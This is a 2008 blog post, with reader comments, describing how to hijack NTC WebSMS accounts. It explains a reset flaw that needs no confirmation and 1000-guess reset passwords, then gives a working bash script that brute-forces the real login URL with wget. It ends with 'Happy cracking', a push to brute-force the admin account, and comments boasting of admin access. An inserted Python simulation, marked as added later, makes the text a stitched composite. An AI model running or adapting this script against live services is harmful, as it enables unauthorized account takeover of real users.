Do Comment and I shall comment back. Your contributions are always welcome at emailadimn@gmail.com.
Nepali Security Community Accessible at NepSecure Google Groups

Sunday, January 6, 2008

Unauthorized Access / Hijacking an NTC WebSMS Account

Please do not take this post as an attack on your website. Our motive is to point out the insecurities in it and to suggest ways to fix them.

Information
NTC WebSMS is a very popular service for sending SMS from NTC's website to any Namaste SIM card holder. One can send at most 10 SMS per day, and the service is completely free, although with a twist: it is available only to NTC SIM card holders, since to get an account you have to enter your SIM's PIN number. Fine!

When an SMS is sent, the recipient receives it from 2424 with the sender's original number in the SMS header. This is how the recipient knows who sent the SMS.


Level of Vulnerability

7/10, since hijacking someone else's account is possible, but then you cannot do anything more interesting with it than send SMS.

The Flaw
I wonder what people think when they create software. Do they think "OMG, I have to finish this application ASAP, I'm drunk and it's due tomorrow"? Probably not, but the password reset option on the website is seriously flawed!

Steps involved in resetting a password:
1) Go to the login page and click Forgot Password.
2) Enter the cell phone number of the account, e.g. 9841123456, and click Submit.
3) You are told that the password HAS BEEN RESET and to check your email for the details.

So anyone can submit my cell phone number and hit Submit; the password is changed instantly, and the next time I try to log in I cannot, because some psycho has reset my password and I was never asked for any confirmation. LAME, LAME! I then have to open the associated email account and hunt for the email.

Dissection of the new password
I got the email with my new password all right, and it looks strikingly predictable. The format of the new password:
if my username is 9841123456, my password is set to 9841123456XXX.0

Cough! Cough! The XXX is a randomly chosen number, anywhere from 000 to 999. That leaves only 1000 possible passwords for a given username.


The Hack
You must have guessed it by now, but I still list the steps for everyone's convenience.

To hack the WebSMS account of 9841123456, follow these steps:
1) Go to the login page, click Forgot Password, type 9841123456 and hit Submit.
2) Since the new password has gone to the original owner, we now brute-force WebSMS.
3) In my case I wrote a bash shell script that uses wget to POST the variables username and password, trying every password from 9841123456000.0 to 9841123456999.0 in turn.
4) Each returned page is saved as 000.txt to 999.txt (yes, 1000 text files).
5) Look at the results and sort the files by size.
6) The page saying "username/password invalid" is about 3 KB, while the page after a successful login is around 16 KB.
7) So if 512.txt is bigger than all the rest, the new password is 9841123456512.0.
8) Log in to WebSMS with this password, go to Options and change the settings, i.e. the primary email address, so that the next time anyone resets the password, I am the one who receives the email with the new password.


Script
Save the following lines as pwfinder.sh, make it executable, and change the value of b to the target username.
#!/bin/bash
# pwfinder.sh - try every reset password from ${b}000.0 to ${b}999.0
b=9841123456            # target username (the phone number whose password was just reset)
a=0
while [ "$a" -lt 1000 ]
do
    n=$(printf '%03d' "$a")   # zero-pad, so the suffix runs 000..999 rather than 0..999
    wget http://websms.ntc.net.np/websmss/login.jsp --post-data="username=$b&password=$b$n.0&flag=1" -O "$n.txt"
    ((a=a+1))
done


Pretty simple.
I originally put an & at the end of the wget line so that it ran in the background, but then the number of simultaneous connections to NTC's web server was very high and gave weird results. Without the &, there is at most one connection to NTC's WebSMS server at a time, so the results were as expected.

To find out which file is the biggest, use your favourite file browser; in my case
$ du -a . | sort -n
and the file I want is at the bottom.
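The whole attack, from the predictable reset password to picking the winner by response size, as an added example that is not part of the original post and does not touch NTC's server. It replays the steps under "The Hack" and the pwfinder.sh script entirely in memory: the login page is replaced by a constructed stand-in (FakeWebSMS), whose 3 KB and 16 KB page sizes are made-up stand-ins for what the post observed, and the strong_reset_token function is my suggested fix, not anything the site does.

```python
"""Added example (not from the original post): simulate the NTC WebSMS reset
flaw and the brute force described above, entirely offline.

Assumptions (constructed for this demo, not taken from the real site):
- a reset password has the form <username><ddd>.0 with ddd in 000..999
- a failed login returns a short page, a successful login a long page
- FakeWebSMS and its page sizes are stand-ins for login.jsp
"""
import random
import secrets

USERNAME = "9841123456"   # the example account used throughout the post


def weak_reset_password(username, rng=random):
    """The predictable reset scheme the post describes: username + 3 digits + '.0'."""
    return f"{username}{rng.randrange(1000):03d}.0"


def candidates(username):
    """Every password the weak scheme can produce: exactly 1000 of them."""
    return [f"{username}{i:03d}.0" for i in range(1000)]


class FakeWebSMS:
    """Constructed stand-in for login.jsp with the size difference the post saw."""
    FAIL_PAGE = "<html>username/password invalid</html>".ljust(3 * 1024, " ")
    OK_PAGE = "<html>welcome, compose your sms</html>".ljust(16 * 1024, " ")

    def __init__(self, username, password):
        self.username, self.password = username, password
        self.attempts = 0   # how many login POSTs the attacker needed

    def login(self, username, password):
        self.attempts += 1
        if username == self.username and password == self.password:
            return self.OK_PAGE
        return self.FAIL_PAGE


def brute_force(site, username):
    """Replay pwfinder.sh in memory: try all 1000 candidates, keep each response
    (the 000.txt .. 999.txt files), and pick the largest one as the logged-in page."""
    responses = {pw: site.login(username, pw) for pw in candidates(username)}
    best = max(responses, key=lambda pw: len(responses[pw]))
    # a real hit must be clearly larger than the failure page; otherwise no candidate worked
    if len(responses[best]) <= len(site.FAIL_PAGE):
        return None
    return best


def strong_reset_token():
    """What a reset should send instead (my suggestion, not the site's behaviour):
    32 bytes from the OS CSPRNG, which cannot be enumerated like 000..999 can."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    site = FakeWebSMS(USERNAME, weak_reset_password(USERNAME))
    found = brute_force(site, USERNAME)
    print("recovered password:", found, "after", site.attempts, "attempts")
    print("a proper reset token would look like:", strong_reset_token())
```

The point of the second half is the contrast: the weak scheme always falls within 1000 guesses, while an account whose password is an unpredictable token is not recovered by the same loop at all, which is why the real fix is an unguessable reset token delivered only after the owner confirms the request.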

Cheers All
Happy cracking

PS. Do brute-force the username admin; I saw some pretty nice links in it!!

14 comments:

Dont mess with me !!!!! said...

hey bro....

the article is great....

I also got the admin password by this process...

And it was a nice experience to see the NTC WebSMS admin's page....

Dont mess with me !!!!! said...

keep rocking bro !!!!

And can't you help with hacking
hotmail or yahoo....

If you have some ideas, please post them..

AVi said...

"At most, one can send 10 SMS per day"..
..but I think we can send as many messages as we want these days..

Danepali Hacker said...

hey man, nice article
and listen, we also have a group
so join our group and help us out
www.gorkhahack.net.tc
www.nepalimadbulls.wetpaint.com

a said...

hey great article...
http://anup-views.blogspot.com
http://anupkayastha.blogspot.com

thanks...

yo said...

hey,
do I have to make 1000 txt files from 000 to 1000, or can I make a single txt file including all the numbers from 0 to 1000, and where shall I put these txt files?
help me!

a said...

really nice blog!!

http://hacktutors.blogspot.com

Unknown said...

NTC web SMS asks for a PIN code / PUK code; can anybody help me solve this problem?

jwala pandey said...
This comment has been removed by the author.
musicbid.co.cc said...

Liked the trick, brother.. Hack the world to use it for free...
Great.
Nepali Chords

Aakash said...

This trick no longer works; go to www.freesmscraze.com and send as many as you can

Unknown said...

I think the things you covered in the post are quite impressive, good job and great effort. I found it very interesting and enjoyed reading all of it...keep it up, lovely job..
web design bangalore

Bangaloreweb guru said...

Nice post. In the meantime we have to know about hacker tricks, so that safe strategies can be built for a website.
Website Design Companies Bangalore | Web Design Company Bangalore
